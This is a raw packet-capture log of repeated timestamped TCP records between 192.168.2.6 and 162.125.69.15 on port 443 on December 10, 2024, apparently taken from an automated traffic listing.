                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.643902063 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.643929958 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.643976927 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.644006968 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.644041061 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.652362108 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.652383089 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.652429104 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.652456999 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.652467966 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.652484894 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.658884048 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.658907890 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.658979893 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.659006119 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.659022093 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.659039021 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.666358948 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.666383982 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.666426897 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.666452885 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.666469097 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.666491032 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.674354076 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.674377918 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.674403906 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.674429893 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.674444914 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.674504995 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.688508034 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.688532114 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.688564062 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.688596964 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.688612938 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.688632011 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.819320917 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.819351912 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.819427967 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.819459915 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.819531918 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.827409029 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.827435017 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.827522039 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.827533007 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.827649117 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.834353924 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.834376097 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.834460020 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.834475040 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.834572077 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.842528105 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.842550993 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.842609882 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.842618942 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.842655897 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.850404024 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.850428104 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.850481987 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.850492954 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.850542068 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.857899904 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.857925892 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.857985020 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.857996941 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.858036995 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.858057022 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.866004944 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.866029024 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.866089106 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.866097927 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.866199017 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.880402088 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.880429029 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.880475044 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.880492926 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.880523920 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:42.880538940 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.011328936 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.011353016 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.011415958 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.011455059 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.011473894 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.011492014 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.019249916 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.019279003 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.019354105 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.019386053 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.019428968 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.027445078 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.027472019 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.027520895 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.027540922 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.027560949 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.027576923 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.034440041 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.034466028 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.034509897 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.034518003 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.034547091 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.034569025 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.042371988 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.042396069 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.042448044 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.042459965 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.042490959 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.049999952 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.050023079 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.050077915 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.050086975 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.050120115 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.058051109 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.058073044 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.058171034 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.058178902 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.058221102 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.072761059 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.072786093 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.072829008 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.072840929 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.072880030 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.073517084 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.215532064 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.215560913 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.215629101 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.215656996 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.215696096 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.223426104 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.223448992 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.223541975 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.223553896 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.223588943 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.231326103 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.231347084 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.231394053 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.231404066 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.231441021 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.238630056 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.238650084 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.238681078 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.238688946 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.238717079 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.238729954 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.246937037 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.246956110 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.247004986 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.247014046 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.247057915 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.253798008 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.253815889 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.253856897 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.253865004 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.253894091 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.261981964 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.262008905 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.262049913 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.262058020 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.262094975 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.269922972 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.269946098 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.269993067 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.270003080 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.270026922 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.270045996 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.701880932 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.701898098 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.701935053 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.701967001 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.701988935 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.702019930 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.702048063 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.703563929 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.703584909 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.703640938 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.703655005 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.703690052 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.705307007 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.705324888 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.705414057 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.705421925 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.705468893 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.707613945 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.707631111 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.707665920 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.707676888 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.707704067 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.707720995 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.709856987 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.709873915 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.709906101 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.709917068 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.709944010 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.709958076 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.712002993 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.712023973 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.712059021 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.712070942 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.712100983 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.712120056 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.713572025 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.713589907 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.713629007 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.713639975 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.713664055 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.713681936 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.716038942 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.716057062 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.716099024 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.716110945 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.716141939 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.716167927 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.716629982 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.718643904 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.718662977 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.718723059 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.718734980 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.718774080 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.718810081 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.721188068 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.721208096 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.721246004 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.721259117 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.721283913 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.721317053 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.722889900 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.722909927 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.722949982 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.722963095 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.722985983 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.723026991 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.724642992 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.724662066 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.724731922 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.724742889 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.724790096 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.727185965 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.727207899 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.727252960 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.727264881 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.727319956 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.727320910 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.728985071 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.729002953 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.729088068 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.729099035 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.729141951 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.731514931 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.731534004 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.731587887 CET49831443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.731604099 CET44349831162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:43.731770039 CET49831443192.168.2.6162.125.69.15
